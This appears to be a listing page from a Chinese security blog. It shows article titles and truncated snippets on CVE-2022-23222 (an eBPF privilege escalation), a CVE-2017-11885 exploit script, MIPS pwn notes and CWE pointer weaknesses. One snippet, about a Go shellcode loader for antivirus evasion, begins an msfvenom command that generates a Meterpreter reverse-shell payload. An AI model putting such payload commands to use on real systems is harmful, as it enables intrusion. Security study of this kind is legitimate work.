0x00 背景 2022年1月14日,一个编号为CVE-2022-23222的漏洞被公开,这是一个位于eBPF验证器中的漏洞,漏洞允许eBPF程序在未经验证的情况下对特定指针进行运算,通过精心构造的代...
CVE-2022-23222漏洞及利用分析
点击蓝字 / 关注我们0x00 背景2022年1月14日,一个编号为CVE-2022-23222的漏洞被公开,这是一个位于eBPF验证器中的漏洞,漏洞允许eBPF程序在未经验证的情...
CVE-2022-23222漏洞及利用分析
0x00 背景 2022年1月14日,一个编号为CVE-2022-23222的漏洞被公开,这是一个位于eBPF验证器中的漏洞,漏洞允许eBPF程序在未经验证的情况下对特定指针进行运算,通过精心构造的代...
CVE-2022-23222:Linux 内核 eBPF 本地权限提升
https://github.com/tr3ee/CVE-2022-23222 近期在对Linux eBPF进行代码审计的过程中,发现了一枚权限提升漏洞C...
c/c++ 内存管理
这是我刚开始学编程里整理的一篇总结,主要是来源一本叫《高质量c/c++编程》的书,很多年过去了,重新复习一下。1、malloc()malloc()函数用来分配内存:将总共需要的字节数作为参数传递给该函...
异构框架之mips框架的pwn学习笔记
异构框架之mips框架的pwn学习笔记基础知识mips、mipsel的区别mips是大端(big-endian)架构,而mipsel是小端(little-endian)架构。指令的用法是差不多的。Pw...
CVE-2017-11885 EXP
#!/usr/bin/env python # -*- coding: utf-8 -*- #Tested in Windows Server 2003 SP2 (ES) - Only works w...
Go编写loader加载shellcode免杀学习
一 简单实现(1)msf生成shellcode,选择输出hex格式。msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168...
CWE-476 空指针解引用
CWE-476 空指针解引用 NULL Pointer Dereference 结构: Simple Abstraction: Base 状态: Stable 被利用可能性: Medium 基本描述 ...
CWE-469 使用指针的减法来确定大小
CWE-469 使用指针的减法来确定大小 Use of Pointer Subtraction to Determine Size 结构: Simple Abstraction: Base 状态: D...
CWE-690 未检查返回值导致空指针解引用
CWE-690 未检查返回值导致空指针解引用 Unchecked Return Value to NULL Pointer Dereference 结构: Chain Abstraction: Com...
CWE-466 在预期范围外返回指针值
CWE-466 在预期范围外返回指针值 Return of Pointer Value Outside of Expected Range 结构: Simple Abstraction: Base 状...
3